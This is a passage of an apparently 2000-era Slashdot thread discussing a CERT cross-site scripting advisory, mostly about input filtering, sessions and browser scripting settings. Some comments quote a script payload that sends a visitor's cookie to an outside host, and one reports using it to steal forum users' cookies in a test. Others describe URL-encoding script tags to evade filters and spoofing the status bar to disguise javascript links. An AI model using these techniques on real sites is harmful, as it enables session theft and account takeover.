    Admittedly this isn't an ideal solution, but personally, for the sites I run, I'd love to be able to turn on this option which would block all tags. I could still get a customer's name and billing info without needing any HTML tags in the input. Yes, I'd be working under a more limited subset of the possible functionality, but the added security would be worth it, and that choice should be available as a configuration option.

  303. No defense against careless clicking. by TheDullBlade · · Score: 2

    Even if /. filtered that out of the link, you could still do it on the other side of a plain HTML link.

    There is no way /. could protect you from running arbitrary Javascript if you click on a link, except preventing posters from linking to arbitrary locations.

    However, since /. works just fine with Javascript off, it's you can defend against it just fine by turning Javascript off while surfing /.

    I don't think this is a weakness of /. but an inherent weakness of Javascript-enabled browsers.

    --
    /.
  304. Re:Works in Slashdot by Wah · · Score: 2

    How about this one

    --
    +&x
  305. Re:but roxen isn't by schon · · Score: 2

    Sorry, I didn't mean for my post to come across as "my server is better than your server" - I was just pointing out the error is assuming that because the "big three" were listed as vulnerable, that all webserver are vulnerable. And yes, I agree that just because someone doesn't respond that they're not vulnerable - but the CERT document doesn't say that Roxen WAS contacted (in fact, it doesn't say anything about them at all.) Now, I may have an incomplete understanding of the problem, but it seems to stem from websites allowing people to post HTML tags in guestbooks and such.. so if the webserver strips out all HTML tags, how does "a simple server patch" not solve the problem? As I said, if the server by default dequotes all HTML (and RXML, and MySQL) tags, how can you say that the server is still affected?

  306. Re:this will steal your slashdot cookies by hey! · · Score: 2

    I tried this out (with my own CGI targeted) and by golly it works -- it steals my slashdot cookie and puts it in the log.


    I tried this out with some other sites I have cookies in and the script doesn't execute.

    Any references on how this peculiar URL syntax works so I can figure why if I replace "www.slashdto.org/notthere" with "mydomain.com/notthere" it doesn't redirect?

    --
    Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
  307. Re: DO NOT FOLLOW THIS by hey! · · Score: 2

    Does it really?

    It shouldn't work; if it does, this would be really bad.

    The script doesn't get executed until the 404 page is sent back from the slashdot server with the offending URL mis-encoded (The &ltscript> string shouldn't become a script tag, it should become &ltscript>

    --
    Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
  308. Re:this will steal your slashdot cookies by hey! · · Score: 2

    Gotcha. I was initially stymied by the fact that the "URL" wasn't a valid w3c URL; now I see that the server as to cooperate in sending the offending script back to the user.

    I've been testing this out on my freethreads based discussion group with embedded HTML turned on. Using your example as a starting point I have successfully stolen some of my users' cookies using this method. Certainly the method could readily be improved (if you can call it that) by making it stealthier, but I've proven that I could in principle be affected by embedded scripts.

    You have to fuss a bit so that the forms processing stuff doesn't insert tags into the script (like &ltBR>). Since the 404 page is properly encoded on my server, I probably an get by with turning off HTML (freethreads has its own simplified "markup" language which is still a problem as far as links are concerned).

    So, I'm wondering. The scenario I've set up allows a malicious user who has access to my site to steal cookies from other valid users of my site. Since I don't have the 404 encoding problem, is there a way that users could have their cookies from my site stolen while viewing content on a third party server? Thus far it seems that the exploit requires that the browser get the malicious script sent back to it by the targeted (e.g. my) server.

    Thus far, it looks like the extent of exposure of my site's protected contents is to people who have the ability to upload HTML tags onto it. Not a good thing, but not too bad either. Do you think this is right?

    --
    Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
  309. Re:CERT Irresponsibility by Rommel · · Score: 2


    You're right, it was down right irresponsible of CERT to put security ahead of making mouseovers work. What's worse, those mouseovers represent "a vast part of the web's functionality." And now we don't have them. Thanks a lot CERT!
    </SARCASM>

    How about:

    * Thanks a lot, sloppy CGI coders, for failing to validate and filter *all* input!

    * Thanks a lot browser vendors, for failing to allow people choice in their browsing. Heaven forbid that I be allowed to choose which JavaScript executes on my broweser -- it's either all or none!

  310. Here's how you do it by pvolt · · Score: 2

    Hey everyone - follow this link!

    I tried to get it working on the new-user sign up page (where you might actually get someone's password), but the html is parsed out there (good work).

    http://net.bruno.net/ (only malicious for the mind)

  311. A well done solution by david.heyman · · Score: 2

    Perfecto Technologies has a really good solution to this problem with their App Sheild. It checks forms on the way out and then checks the data coming back to make sure it fits what it expected. I've seen this done as a home grown solution at a Euro telco and it seems to work very well.

  312. Re:Interesting by EasyTarget · · Score: 2


    The problem with this is that a lot of links these days are really (hundreds of characters sometimes) long, the browsers I know display the target left-justified, so I often can't see whole link without doing some painful stuff.

    Plus, I might have a good idea what to look for, but the vast majority of folks wouldn't know a scriptlet from a rubber duck. How does this sort of advice help my parents? A ten minute talk about 'trust' will do a lot more for them.


    EZ
    -'Press Ctrl-Alt-Del to log in..'

    --
    "Oops, I always forget the purpose of competition is to divide people into winners and losers." - Hobbes
  313. Holy Shiznit! by drivers · · Score: 2

    Imagine the damage that CNN troll could do with this.

  314. returntrue by drivers · · Score: 2

    I'm using IE (at work). The command "returntrue" is an error. Are the spaces getting stripped or something?

  315. Holy Shit! by Weezul · · Score: 2

    You could write a /. troll virus! It would post it's self as a link which submited a post contining it's self as a link when you clicked on the link. Would be very nasty. Lucky most of the /. trolls seem to have a sence of nobility and post silly stories instead of nasty things.

    Also, it will not be to hard for Rob and eam to fix this hole in /. by having the submit button investigate things that web browsers interpret diffrently (and not just HTML tags). I just hope Rob sees my warning about the possbility of a /. troll virus.

    Jeff

    BTW> You would need javascript to make a troll virus with an unlimited life span, but you would not need javascript to make a troll virus which only lived for a limited number of reproductions, so it might also be a good idea for /. to refuse posts which are submitted using the GET method.

    --
    The Christian religion has been and still is the principal enemy of moral progress in the world. -- Bertrand Russell
  316. Does this not rely entirely on QUERY_STRING? by SnakeStu · · Score: 2
    Unless I'm missing something, the only real danger is from malicious code included in the QUERY_STRING (the part of the URL after the ? mark, in case anybody here doesn't know that). If that is the case, then we have a single point of entry to secure -- nothing else is necessary if we ensure that the QUERY_STRING doesn't include anything it shouldn't. (Or, to look at it another way, if we ensure that it only includes what it should.)

    Please correct me if I'm wrong, but please understand the advisory first! (Too many of the comments here have shown a lack of understanding, assuming it was the "protect user B from user A" issue.)

  317. Re:Does Amazons "one click shopping" fall under th by GregGardner · · Score: 2

    I don't know exactly how Amazon's one-click works, but I'm pretty sure it can't have the problem you are describing. When you turn on Amazon's one-click, they give you a cookie to identify you. When you have this cookie, you get the one-click link on all of their product pages. When you click on the one-click link, the server processes the link and also can check to see that you have the cookie and that the identities match. So you could send the one-click link to someone else, but if they clicked on it, they wouldn't have the cookie identifying themselves as you.

    And even if someone was trying to be malicious and somehow sniffed your traffic and got the cookie amazon gave you when you turned on one-click and somehow put it in their own browser, and then in their browser when to your URL to one-click buy something, they wouldn't get the product for themselves. They would just be buying the product for you with your credit card since the shipping address and billing info is associated with the one click. And it's possible Amazon has some other security measures that even make that scenario impossible.

    Oh, and referres can be faked, so they are hardly security precautions. But it's possible they do something like send something in plaintext and encrypted and then decrypt the ciphertext and make sure it matches the plaintext.

  318. Re:This is really nothing new by DeadSea · · Score: 2
    Let me demonstrate this by posting the link that I created. If example.com supported this script, and "malicious code" were actually malicious, clicking on this link would screw you. :-)

    Click Here

  319. Re:Interesting and valid security hole by matman · · Score: 2

    Well, I did this to kill whitepower.com's guestbook like, a year or 2 ago.

    Again, I think that this kind of problem indicates that the web programmers are totally amature. I mean, you DO NOT TRUST THE USER. heh if you do, you're just asking for trouble. I'm not saying that I'm a good programmer or a very experienced one - its just common sense.

    The most obvious and common screw up of this sort, is when someone tries to include some html tags in a dynamic post - like and they forget to close it - you see it all the time - the rest of the page starts blinking. The best way that I've found to fix this, is replace all tags with &gt and &lt and then specifically re-enable particular tags like
    and and check that there are closing tags. That way you get fewer problems.

    But again, I think that there needs to be some kind of checklist of key points to remmeber and check when developing apps - simple stuff like, "dont ever interpret code that a user could have a part in creating" or "dont trust the user to get it right" "dont trust that the user is friendly" stuff like that - and as i said im not very experienced, so im sure that there are a lot more helpful points that someone could supply. :)

  320. Stating the obvious. by Inoshiro · · Score: 2

    CERT seems to be stating the obvious here. And I'm glad. People need this rammed into their heads: if you want security, separate CODE and DATA. Once these are separated, you can begin to selectively allow trusted places to include code with the data.

    I have selective way of enabling Javascript for trusted sites in Opera or Netscape, but Mozilla could add this much needed feature -- allowing me to run without Javascript, unless it's needed for something. Security is increased in this way.

    Netscape's horrible 4.x browser seems to require Javascript for CSS to work at all, though, so you have to settle for disabling Java, and forcing it to use a Junkbuster proxy (nukes cookies except for the exceptions), and another for script escaping.

    Web boards, AFAIK, espcape all content by default. This is fine, as escaped content comes out as visible data, and not as possible malicous code. The various exploits only seem to affect sloppyily programmed webboards (ie: not Phorum, it's secure).

    Maybe someday we'll be allowed one click "trust for js" "trust for cookies" "trust for java" etc... As they are all executable code or, in the case of cookies, serial numbers allowing tracking (think doubleclick.net). CSS1 and HTML4 are perfectly secure by themselves -- remember that. Opera runs fine in "HTML & CSS only" mode.
    ---

    --
    --
    Internet Explorer (n): Another bug -- that is, a feature that can't be turned off -- in Windows.
  321. animations restart (Was: What a stupid problem!) by Matt · · Score: 2
    In Navigator you can stop animations once the page is loaded, using the ESC key.
    Sometimes. Often I find that they start right back up again. If I was proficient with the junkbuster configuration files, I'd immediately add any animation that did that into my killfile.
  322. Re:What a stupid problem! by scumdamn · · Score: 2

    Actually, at work I'm "lucky" enough to be behind a proxy server. I set IE to not use a proxy for doubleclick addresses. I see many fewer ads that way.

  323. Re:What a stupid problem! by TummyX · · Score: 2

    IE5 is getting there, if you look under [Tools Internet Options] -> [Security] -> [Custom Level] -> [Microsof VM] -> [Custom] -> [Java Custom Settings]

    Then there's some pretty funky stuff you can do with twiddling what java can and can not do. Can't do everything you want *yet*.

    However, you can always write IE5 plugins to intercept and override the popups and stuff.

  324. Client side is all that bad by TummyX · · Score: 2

    Slightly off topic (but here it goes anyway).

    I've noticed quite a few posts saying that client side is all bad etc etc. Well, I was just reading an msdn mag article today (yes microsoft :|) and it demonstrated some pretty awesome stuff you could do with client side.

    Essentially, what it was doing was a client side web app inside IE would query a SQL server over the internet (SQL Server supports queries over HTTP now) and request SQL to send the result as XML. What it queried was vector data for New York city. It would then transform this XML data returned by SQL Server using XSL into VML, then use IE5's VML capabilities to render the VML on the page, and voila, a nice map of new york, all generated DYNAMICALLY over the internet, and just about all client side. The only thing the server had to do was send the database records over as XML (all inbuilt into SQL & IIS).

    Sounds a bit like a sales pitch I know, but if that's not COOOOOOL, I don't know what is. It's certainly one of the most impressive demonstrations of SQL+IIS+XML+IE5 together. Microsoft thru all it's flaws can certainly grab onto a technology (like HTML/XML/HTTP, and the Internet) and integrate it into all their products pretty consistantly.

    This kind of stuff is the stuff that makes me droool, and really is being used on LANs out there now days, it's a bit too 'new' to be used live on the internet (considering how far behind netscape is :/).

    If you want to check it out, here's the URL to the article and source.

    Here

  325. Re:this will steal your slashdot cookies by ecampbel · · Score: 2
    Maybe the reason is that when you change www.slashdot.org to www.Amazon.com, Amazon.com returns the following 404 page:

    The requested URL /notthere&ltSCRIPT&gtdocument.location='http://ali ves.znep.com/cgi-bin/printenv was not found on this server.


    On the other hand, if you leave the link as originally posted, slashdot.org returns the following 404 page:
    The requested URL (notthere&ltSCRIPT&gtdocument.location='http://ali ves.znep.com/cgi-bin/printenv?'+document .cookie&lt/SCRIPT&gt) is not found.

    Thus, it seems that Slashdot's 404 reporting method does not do the same filtering as Amazon.com's 404 reporting method. Slashdot needs to fix this exploit immediately since this seems to be clearly the most dangerous threat to one's cookies. Also, while Slashdot filtered out SCRIPT when it was enclosed inside less than and greater than symbols, it didn't properly filter out the tag when it was enclosed by ampersand lt and ampersand gt. Shouldn't Slashdot filter out both versions of the tag?

    --

    Sig goes here
  326. Re:Interesting and valid security hole by signine · · Score: 2

    MHO, most of this problem could be solved by having smarter browsers. Granted, it is a difficult problem, but what is this about ActiveX controls allowing you to reformat a hard drive!? That is utterly ridiculous. I can't believe that any browser manufacturer would even consider allowing this kind of access to the underlying OS (and I actually _like_ IE).

    This idea seems to have one very major flaw. If your solution is to make a smarter web browser, you'd also have to make sure that everyone used said web browser. As was the point issued by the man whose post you replied to, you cannot trust the end-user. He may be using the latest "safe" version of netscape, or he may download the code with wget, and then telnet into port 80 and issue the malicious request in this manner.

    In short, client software should never be held responsible for server inadequacy.
    --

    --
    If there is a God, you are an authorized representative. - Kurt Vonnegut Jr.
  327. Re:Interesting and valid security hole by guran · · Score: 2
    And you just showed that slashdots code is not flawless either :-)

    I think it can be summoned up like this:

    Never use any unvalidated free text entered by a user!!!

    How many of you has tried entering a "%" in a search field? (making a badly designed script do a free text search through the whole database returning *everything*)

    --

    All opinions are my own - until criticized

  328. Bullshit? Not really by guran · · Score: 2
    CERT actually recommends in their notice that users disable all scripting in their browsers!

    Yeah, so? That has been good advice ever since the client-side scripting stuff started to show up.

    Sorry, some scripting is good. See below

    ...From what I've seen, the main use of Javascript is that newbie webmeisters try to use it as a replacement for links.

    Javascript is useful for two purposes (flashiness aside)

    1) Validating webforms. Checking some input before the user submits (in both senses) saves a lot of frustration. Sure you can (and must) do a server side check, but waiting for a new page to download, simply to tell me that i forgot a compulsory field is a pain in the behind. Plus it takes some load off my server.
    2) User friendliness. Now don't go. Call it "Luser friendliness" if you like to insult your customers, but the fact is that an URL does not mean much to the average Joe. You and I might be able to guess something about a link by looking at that url in the status bar. Joe User *can't*. When designing a good web UI, the main problem is how hard it is to provide instant feedback on a web page. You don't want to reload a page, simply to provide extra information about a link.

    Browser makers could have shipping their browsers with all client-side execution "features" disabled by default, all along.

    No, they could have made sure that client side scripts were "safe". Not accessing cookies with Javascript or allowing object.create in ActiveX for example. The main trouble here is that "Malicious code" actually can be malicious.

    --

    All opinions are my own - until criticized

  329. CERT REsponsibility by bago · · Score: 2
    They had a duty to inform the IT community about a large security hole. Stating otherwise is just a weakness in your own pride and ability to deal with setbacks. Yes, the press is going to treat this badly, but it's not exactly going to resonate strongly with most people. A flaw in the http protocol like this is a bit of a saucy item for a news reporter, but due to it's somewhat arcane nature (try explaining to your mother what a protocol is) press coverage will be tempered. It just doesn't have the same human interest as a plane crash would.

    A final thought would be: "Don't shoot the messenger"

    --
    .
  330. Re: Why store password in cookies? (Use sessions) by Ru610 · · Score: 2

    There is no need to store the password in cookies. When I build a website (in PHP) I always keep sensitive information in session variables at the server. The only thing stored in a cookie is the session ID.

    One could even argue with that because I've heard of bad proxies caching cookies :-(. Anyway, if slashdot would use sessions there would be no need to store passwords in cookies. Also, the way it is now, the password is sent across the wire (in CLEAR text) at every page request. This is very bad.

    To see a real nice solution to this check out PHPLIB. It uses a challenge/response type authentication and sessions. The challenge/response requires Javascript (:-) to generate the MD5 hash of the password together with the challenge so it is never transmitted across the wire in cleartext.

  331. Re:Is this a new discovery? by autechre · · Score: 2

    No, this isn't new. My belief is that clued admins will continue to thoroughly test things, while the clueless will not change either. See, if everyone
    actually did what they really should Re: security, then there would be no
    need for this advisory...but they don't. I suppose it's sort of like Public
    Service Announcements; most of the time, it's the same message over and over,
    because:

    a) There is fresh blood, who may not know where to look.
    b) There are lots of morons who never bothered to fix it the last time
    something like this went out.

    Also, some people believe that they are being security-conscious, but they are
    _still_ following the model of "make sure no invalid data is accepted", instead
    of "make sure all accepted data is valid". If you say "I want to block this
    list of stuff", then you will probably miss something. If, however, you
    instead say "I will only allow this list of stuff", it's far easier to get
    it right.

    --
    WMBC freeform/independent online radio.
  332. Re:What a stupid problem! by burris · · Score: 2
    Another option to turn off is the attachment of scripts to buttons on the tool bar. The "Back" button should ALWAYS take you back. NEVER should it execute a script that takes you to yet another pr0n site. Sometimes I wonder what the browser designers at Netscape and M$ have been smoking.

    The nice thing is the stupidity and kowtowing to big money interests practiced by the biggies (AOL/Netscape and M$) creates a niche for alternative browsers that do things like filter banner ads, disable portions of javascript, and don't have annoying "Shop" buttons and bookmarks to their partners that you cannot remove. Navigator and IE will never have banner ad filtering.

    In Navigator you can stop animations once the page is loaded, using the ESC key.

    Dr. Burris T. Ewell

  333. Re:Interesting and valid security hole by 348 · · Score: 2
    mucho ugliness.

    needless to say, a lot of folks who don't pay attention to status bars and address bars could fall prey. . .
    If you have eyes that can keep up with the ever-so-quickly changing text. Some of these scroll by so fast it's just a blur.

    The only way we can reliably fix this hole is for all of us running servers to remove trust of clients -- we can't depend on clients to disable scripting or cookies.

    Oh how true this is. and how ugly. As you stated there is no quick fix for this, it is built in to the basic architecture.

    Never knock on Death's door:

    --

    More race stuff in one place,
    than any one place on the net.

  334. Re: Why store password in cookies? (Use sessions) by hog2 · · Score: 2

    With PHP session storage is file-based so you could share the same session directory between multiple servers.

    Hmmm, file-based session variables might work, but it seems like it would really slow things down. The reason to use load-balancing is to speed things up.

    But I'll admit I have never tried it personally.

    Cookies lasting longer that sessions is Ok if you're the only one using the client computer but in settings like a public Internet facility you don't want that sort of stuff.

    Most sites that do store persistent cookies will advise that you "log out" when you're done. But you're right, that is another disadvantage of cookies that I didn't list.

    Storing only the username in a cookie is VERY dangerous! This way an attacker could forge a cookie with only a username and gain access

    This is possible, sure. I was thinking of sites like Slashdot where the reward for such forgery would be minimal.

    The problem I had in mind was that people use the same passwords on many different sites, so while forging someone's slashdot account is not a huge deal, stealing their slashdot password might be.

    I've never heard of any web development guides which recommend against using session variables. Please point me to them, I'm very interested.

    I don't know of any on-line guides that are relevant here (large-site design). The MCSD+I training materials do make this recommendation, if you put any stock in that. (I'm not an MCSD (thank God), but the guy across the hall is.)

    --
    --Kirk
  335. Re:CERT Irresponsibility by Anomalous+Canard · · Score: 2

    CERT actually recommends in their notice that users disable all scripting in their browsers!

    And I've been doing it for years. Some (few) sites are unusable. I either do not use them (often) or turn Javascript on, use them, and turn it back off. My bank's web banking site is one of the few where I will actually go to the trouble of turning on JS just to use it and even then I don't do it often because it is a hassle.

    Frankly, the web isn't much different without scripting.

    Anomalous: inconsistent with or deviating from what is usual, normal, or expected

    --
    Anomalous: deviating from what is usual, normal, or expected
    Canard: a false or unfounded repor
  336. You don't have to click! by Marshal+Ney · · Score: 2

    move your mouse over this

  337. Re:Is this a new discovery? by I)ruid · · Score: 2

    This is not a new discovery, in fact, we released an advisory about it in December of 1998. The advisory can be found here: http://www.caughq.org/files/pub/A dvisories/000005. This advisory was sent at the time of release to Yahoo, who promptly fixed their search engine, and was also sent to the BugTraq mailing list where it was promptly denied posting because "This isn't a hack." This has been around for quite a long time, I guess it just takes a CERT advisory to make people take notice.

  338. Slashdot is tracking my sexual orientation!!! by Anonymous Coward · · Score: 3

    Why is it doing this!!! How does it know my Visa number!!! Damn you cmdr taco!!!

  339. Re:What a stupid problem! by Anonymous Coward · · Score: 3

    Another important option: no changing status bar messages. By using an ONMOUSEOVER event to change the status bar message, you can make it look like a link is harmless. The status bar may show "http://www.slashdot.org/" when the real link is "javascript:evilcode".

  340. Promiscuous Browsing? by GeorgeH · · Score: 3

    Does not engaging in promiscuous browsing mean that I can't use Dug Song's Webspy program? Or does it mean that I should just stop looking at all this pr0n? I'm so confused.
    --

    --
    Why can't I moderate something "Wrong" or at least "Grossly Misinformed"?
  341. this _IS_ news. by Marc+Slemko · · Score: 3

    There are issues here that have not been widely known before. The issues that have been known for a long time are that if user A submits content for user B to view, it has to be properly encoded. This advisory shows that even if user A submits content that only user A views, it can still pose a security problem. Even worse, encoding things properly is a very difficult task, especially when alternate character sets are concerned.

    Many many many sites are vulnerable to this. yahoo, ebay, various Microsoft sites, amazon, etc. The list goes on. Slashdot is vulnerable.

    I like to think I know what I'm doing around the web, and I certainly had trouble figuring out all the ins and outs of how things have to be encoded in particular situations. I still don't think they are all figured out.

    The real issues here are a lot more subtle than they may appear at first. While the basic components of the issue aren't anything new, and no one familiar with the technologies should be suprised to hear that this issue exists (even without being aware of the details beforehand), they have never been publicly put together in this manner.

    Also note that this isn't just about script tags; you can insert other HTML that can be just as dangerous.

  342. This isn't all bad: Bookmarklets by deusx · · Score: 3

    Try Bookmarkets.com, because believe it or not, this has all been done before and it's actully pretty useful.

    Note-- Javascript laden links ahead: (None are malicious)

    You can do things like this executive dice roller.

    Or, read your cookie that was set for this site. How about seeing when this page was last modified?

    See a word over 2 syllables you don't know on Slashdot? Search at Dictionary.com.

    Do a reverse lookup on someone's phone number.

  343. Needed: Accessible JScript on/off Control by Bernal+KC · · Score: 3
    I would settle for making the Jscript on/off switch more accessible. I toggle it on and off frequently -- but it is way more difficult than it ought to be. Espcieally with IE.

    Has anyone rolled an app/applet that makes it easier to toggle Jscript?

    [I'd also love to have another utility to clear my Win Documents menu.]

  344. Interesting by Roofus · · Score: 3


    Basically, check the link before you click it. Look for any sign of an ebmedded evil script in the ?variable=badstuff.


    Of course, if the method is post, you really can't see it then.

    Also, check all forms to make sure that the submit button is taking you to where you think it will.

    These tricks are nothing new. And after it all, I probally won't change my browsing habits.

    1. Re:Interesting by GoRK · · Score: 5

      A Javascript OnMouseOver inside of an Anchor tag can change the apparent destintaion of a link by changing the text in the status window. So unless you like digging through the page's HTML and checking out the link you're clicking then this isn't really verifiably secure.

      I for one think this is a stupid feature of javascript. I want the statusbar to tell me what the link is doing. A webpage shouldn't have the ability to screw with my browser's status bar! At least this should be a javascript option -- "Restrict Statusbar control" -- as other people have pointed out -- on and off aren't enough control!

      ~GoRK

  345. I hate to say this ... by Lumpish+Scholar · · Score: 3

    ... but IE 5.0 does a pretty good job of handling this for expert users only.

    IE divides the universe into four "zones": "Internet" (the default), "Trusted sites", "Restricted sites", and "Local intranet". (An explanation of the last would be really complicated.)

    It's possible -- but not easy -- to designate certainly sites (e.g., *.yahoo.com) as trusted, with one set of policies for cookies and "active content" (Javascript and Active X), another set (e.g., *.doubleclick.net) with a much more restrictive policy, and the Internet (default) zone with fairly paranoid policies.

    On the system I'm most paranoid about (the laptop I use for e-mail), every attempt to send persistent cookies or run Javascript is flagged, and permitted only if I say it is. (Hint: Slashdot runs just fine thank you without Javascript.) It's a pain in the tush, but scary enough to keep me at it.

    I can deal with this. My mother couldn't. --PSRC

    --
    Stupid job ads, weird spam, occasional insight at
  346. This is really nothing new by CaptainSuperBoy · · Score: 3
    Applause to the CERT for speaking out on this issue.. however as a developer of web applications I'll say that this has always been a factor. Any time you take information from a user and serve it back, your site / users are at risk of being abused. It doesn't matter if you serve it back to everyone, or only the user who submitted the information.

    Consider Slashdot, for example.. you'll notice that it says Allowed HTML and has a list of permitted tags when you are posting. This is so that you don't do anything funny with javascript, forms, or even the blink tag (yuk).. any site that accepts input like this needs to scan for possible malicious tags.

    One more concern I've seen is generic error message pages, where the error message is passed in using a GET type encoding on the URL line. This is so that admins don't have to make multiple pages for "password incorrect", "no username", "our database is down/broken", etc.. however a user can just change the error message that is passed in and possible include malicious tags in this. I'd recommend using error codes instead, that map to hard-coded error messages.

    1. Re:This is really nothing new by zantispam · · Score: 3

      Actually, this one would probably screw you worse...

      Yes kids, it is malicious...

      (Actually, I could make it worse still if I could figure out a way to make /. recognize onMouseOver and onMouseOut. Put a killer javascript link in, onMouseOver="window.status='http://friendlyplace.c om'; return true" onMouseOut="window.status='Document: Done'; return true". That would be killer...)

      Here's my copy of DeCSS. Where's yours?

      --

      censorship is a form of noise, which actively seeks to drown out content with silence - Crash Culligan
    2. Re:This is really nothing new by DeadSea · · Score: 4
      I really doubt that slashdot is immune to this.
      The article brings up the point that malicious scripts can be submitted in links like this one. When you click on them you execute malicious code.

      <A href="http://example.com/comment.cgi?mycomment= <SCRIPT>malicious code</SCRIPT>"> Click Here</A>

      Slashdot wouldn't allow this (i assume) because it would see the script tag and not allow it.

      It would be very easy to fool slashdot in this instance. (I haven't tried it, so correct me if I am wrong.) When URLs are submitted to a server, they are often URL encoded. That is characters are replaced by their respective ascii values. You probably have seen a %20 in place of a space many times, its one of the most common, but it can be done with any character. The first thing that a server usually does when it gets a page request is to URL unencode the URL.

      So now imagine that I create the link:

      <A href="http://example.com/comment.cgi?mycomment= %60%83%67%82%73%80%84%62malicious code%60%47%83%67%82%73%80%84%62"> Click Here</A>

      Now Slashdot doesn't find script tags, but the server that gets the URL still does.

  347. Mobile Code: Threat or Menace? by Crispin+Cowan · · Score: 3
    I blame mobile code for this fiasco. My precise definition of "mobile code" is "code that crosses a trust barrier". Thus examples of things that are mobile code include:

    • Java and Javascript applets
    • Macros attached to MS Office documents
    • ActiveX "controls"
    • "Foreign" active network applets running on "my" routers
    • E-mail attached .exe files
    Examples of things that are not mobile code include:

    • computational functions migrating around a distributed cluster
    • agents migrating around a LAN or a distributed virtual LAN
    • vendor-supplied upgrades to a system
    • duly authorized installation of new software
    • Java applications that were explicitly installed to add functionality
    By these definitions, I argue that mobile code presents far more threat than benefit. The "weak beneift" argument is that most of the benefit provided by mobile code comes in the form of dynamically interactive applets. The applets provide finer-grained interactivity with the user. This is strictly an ease-of-use issue, as the server must check everything that the appliet produces. The only applications where this actually matters is games, and people who give up security for gaming get what they deserver :-) Less flippantly, game applets are easy to effectively sandbox by giving them absolutely zero access to the client workstation.

    The "major hazard" part comes from the difficulty of effectively confining an untrusted applet such that it gets controlled access to the client host workstation. The more complex the semantics of interpreting downloaded information, the more difficult it is to establish whether it is safe (cf recent discussion on firewall-wizards about whether CheckPoint FW1 is effectively stripping dangerous tags from HTML content). The more powerful the semantics of the downloaded information, the more able the adversary is to build attacks that escape static analysis by computing the actual attack code on the fly.

    I think that powerful tools are required to enable administrators to enforce a ban on active content. These tools might include:

    • a filter that can strip macros from MS Office documents
    • firewalls and browsers that detect active content (Java, Javascript, ActiveX, MS Office macros, etc.) and send back an e-mail to postmaster@originating.site explaining that their active content has been stripped, and they had best prepare documents and web pages that work without the active content.
    That last tool is an especially powerful thing that the open source community can do to try to smarten up giddy web developers who think that every new feature to come along is just so cool that it must be used. To make the web safe to surf, we need to push back against the goobers who ware re-defining HTML to require scripting to make a site usable.
  348. That's not quite the point by Sabotage · · Score: 3

    I think the original poster was trying to say something a bit different.

    The Scenario: I, malicious content poster and author of evil pseudoscientology books, post a perfectly normal looking URL that actually links to the URL for the one-click 'buy this' stuff.

    You, innocent reader and user of Amazon's one-click shopping, decide to follow my link. Next thing you know, you've purchased my book and I get royalties. You already had the Amazon cookie on your machine because of pash purchases. I wasn't trying to get you to pay for something that ended up in my hands, I was merely trying to get you to PAY for something.

    I'm not an Amazon frequenter, so I don't know what the URLs look like or if this is even possible.. I'm just clarifying the original poster's suggestion.

  349. Not ALL webservers are affected... by schon · · Score: 3

    Basically, all clients and all Web servers are affected by this problem

    Well, in a word, no.

    Apache, MS, and Sun's server products are affected by this, but that's hardly every web server.

    Roxen is not affected, as by default it dequotes all input sent by a client. If explicitly requested, the web page author can get the raw data, but by default, the designer doesn't have to worry about it. (This is one of my favourite features of Roxen :o)

    Co-incidentally (or perhaps not), Roxen is the web server used by Securityfocus.com (the administrators of BugTraq)

  350. Perhaps with a major consumer panic ... by bridgette · · Score: 3

    Websites that are totally unusable without scripting will begin to feel some pressure to clean up their acts.

    Obviously most "major" sites don't give a rat's ass if they piss off or exclude a few geeks who get all 'paranoied' about security - or worse yet, run some non Win OS or some non IE/NS browser. (OT: don't get me started on the ones that require flash)

    We can only hope that if 'joe average' starts disabiling scripting and complaing about all the sites that no longer work, maybe, just maybe, the web will become a bit more 'geek-friendly'

    EOR

    --
    - bridgette
  351. Removing popups and banner-ads by fegu · · Score: 3

    Siemens has developed a free-for-non-commercial-use small webproxy designed to be installed on either a client machine or server (Win98/NT/2K only mind you). It has lots of configurable options including eliminating popups and graphics of user-definable sizes (provided the IMG links contain HEIGHT and WIDTH attributes the proxy doesn't even load them). I have used it for a year now and I am very happy with it. Speeds up the browsing and reduces visual noise.

    Go to http://www.webwasher.de (English site). A separate company called Webwasher.com AG now promotes it, but it was originally designed by Siemens.

    --
    "There is no substitute for thinking" - Bjarne Stroustrup
  352. Other issues by Cyberllama · · Score: 3

    I don't think any experienced users will have any problems with this. Anything you put in the comments will show up when the mouse cursor is over the document (well, not in lynx, but you get the idea) so you see the link location, in this case you'll see code. It's also interesting to note that IE has the additional insecurity that you can actually EMBED HTML CODE DIRECTLY INTO THE HYPERTEXT LINK ITSELF using "about:". For some strange reason, if you click on an like that starts with "about:", instaed of an actual website, IE will echo all that information back as if it were a webpage (including parsing of any HTML). An example? IE users paste (slashdot won't let me actually post it as a hyperlink, which is good) this url in their browser "about://(html)(head)(title)hi(/title)(/head)(p)Hi all you crazy IE users(/p)(/html) and replacing all the ('s and )'s with greater than and less than signs.

    NOTE: I'm pretty sure it was about: that caused this unusual effect(it might have been something else, I don't have IE handy to test with). If it's something else, someone else can respond and correct me. (its been over a year since I discovered this, I sent it bugtraq, but it was never posted and according to the moderator this was a well-known thing, which I'm sure it is)

  353. CERT Irresponsibility by dbm00 · · Score: 3

    Frankly, I think this kind of notice is totally
    irresponsible on the part of CERT. This is exactly the kind of news that the media loves to latch onto and turn into all kinds of sensational press. CERT actually recommends in their notice that users disable all scripting in their browsers! There may well be a security issue here, but that does not justify risking a major consumer panic... Scripting is a key feature of almost every interesting site these days-- even the one's that don't do a ton of stuff on the client side have nice "mouseovers" to allow friendly messages for the user at the bottom of the screen.

    Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely. They should have cooperated with other authorities on the web to publish this information in a more sensible manner. Doing things this way just draws attention to a problem that can be solved inside of the engineering circle and without bugging the consumer.

    Just my two cents...

    1. Re:CERT Irresponsibility by Genaro · · Score: 4

      Quite on the contrary!

      This has been an issue for a long time. If at the time of reading this issue is still unsolved it only means that the industry will not solve it by itself.

      Users should demand better security. The only way they can do it is being informed of the risks involved.

      We have seen soooo many sites depending on this features for no reason at all for sooooo much time.

      I think it is needed more pressure.

    2. Re:CERT Irresponsibility by Sloppy · · Score: 5

      CERT actually recommends in their notice that users disable all scripting in their browsers!

      Yeah, so? That has been good advice ever since the client-side scripting stuff started to show up.

      Scripting is a key feature of almost every interesting site these days

      Bullshit. You must be on a different web than I am, because I have never seen a web browser where Javascript was a key feature -- not counting stuff like games that are written to show off what Javascript can do. From what I've seen, the main use of Javascript is that newbie webmeisters try to use it as a replacement for links.

